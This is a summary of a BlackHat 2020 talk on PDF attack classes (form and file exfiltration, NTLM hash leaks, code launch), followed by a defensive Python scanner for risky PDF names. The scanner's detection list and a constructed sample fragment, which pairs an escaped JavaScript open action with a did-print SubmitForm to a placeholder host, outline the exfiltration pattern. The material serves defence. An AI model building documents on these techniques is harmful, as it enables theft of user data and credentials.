Portable Document Flaws 101

Conference: BlackHat USA 2020



PDF documents are complex and have dangerous features that can be exploited by attackers to exfiltrate data, execute code, and leak credentials.
  • PDF viewers that implement the full PDF standard are flawed by design and vulnerable to attacks
  • Limiting resources that a single document can consume can prevent malicious documents from affecting the whole application or operating system
  • Removing or restricting JavaScript can reduce the attack surface
  • Secure PDF processing applications should identify and block dangerous paths in malicious documents
  • PDF forms can be manipulated to exfiltrate data and leak credentials
  • PDF streams can reference external files and be used to exfiltrate arbitrary files from disk
The speaker demonstrated how a PDF form can be manipulated to exfiltrate user input data to an attacker's server by combining the "did print" and "page closed" events. They also showed how PDF documents can silently exfiltrate arbitrary files from disk by embedding them in the document and using the submit form action or JavaScript to send them to an external URL. Additionally, they discussed how PDF documents can leak NTLM hashes for Windows user credentials, which can be used for offline cracking or relay attacks.


PDF is a document format on steroids. In this talk, we will dive deep into the PDF specification and reveal its less known, insecure features. We perform a systematic and in-depth analysis of the capabilities of malicious PDF documents leading to vulnerabilities in all major PDF viewers. Our attacks are categorized into four classes: (1) Denial-of-Service attacks affecting the host on which the document is processed. (2) Information disclosure attacks which track who opens a document or leak personal data out of the victim's computer to the attacker's server, such as PDF document form data, local files, or user credentials. (3) Data manipulation attacks which modify form values, write local files on the host system, or mask the displayed content of a document based on the opening application. (4) Execution of code on the victim's machine, by silently launching an embedded executable. Finally, we propose a methodology to systematically protect against attacks based on legitimate-but-dangerous PDF document features.
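
A triage check in the spirit of the recommendation to identify and block dangerous paths, added here as an example and not taken from the talk or its authors. It scans raw PDF bytes for name objects tied to the features listed above, normalising `#XX` name escapes first; the selection in `RISKY_NAMES`, the `quarantine`/`allow` policy and both sample byte strings are assumptions constructed for this example.

```python
import re

# PDF name objects mapped to the feature classes the summary lists.
# This selection is the example's assumption, not the speakers' own list.
RISKY_NAMES = {
    "JavaScript": "script execution",
    "JS": "script execution",
    "Launch": "launches an application or file",
    "SubmitForm": "sends form data to a URL",
    "ImportData": "imports form data from a file",
    "GoToR": "opens an external document",
    "URI": "resolves a URL",
    "OpenAction": "action run when the document opens",
    "AA": "event-triggered actions (did print, page close, ...)",
}

# A name is "/" followed by regular characters (no whitespace, no delimiters).
_NAME = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
_HEX = re.compile(rb"#([0-9A-Fa-f]{2})")

def decode_name(raw: bytes) -> str:
    """Undo #XX escapes so /J#61vaScript is compared as JavaScript."""
    return _HEX.sub(lambda m: bytes([int(m.group(1), 16)]), raw).decode("latin-1")

def scan_pdf(data: bytes) -> dict:
    """Return {risky name: [byte offsets]} for uncompressed PDF content."""
    hits = {}
    for m in _NAME.finditer(data):
        name = decode_name(m.group(1))
        if name in RISKY_NAMES:
            hits.setdefault(name, []).append(m.start())
    return hits

def verdict(data: bytes) -> str:
    """Policy sketch: quarantine on any risky name, otherwise allow."""
    return "quarantine" if scan_pdf(data) else "allow"

# Constructed samples: dictionary fragments, not complete PDF files.
SAMPLE_RISKY = (b"<< /Type /Catalog /OpenAction << /S /J#61vaScript /JS () >>\n"
                b"/AA << /DP << /S /SubmitForm /F (https://example.invalid/c) >> >> >>")
SAMPLE_BENIGN = b"<< /Type /Page /MediaBox [0 0 612 792] /Contents 4 0 R >>"

if __name__ == "__main__":
    for label, blob in (("risky", SAMPLE_RISKY), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(blob))
        for name, offsets in scan_pdf(blob).items():
            print(f"  /{name} at {offsets}: {RISKY_NAMES[name]}")
```

A byte-level scan only sees names stored in the clear: objects inside compressed object streams or encrypted documents must be decoded by a PDF parser before this check is meaningful. Matches inside string literals can also produce false positives, which is acceptable for a quarantine-and-review policy.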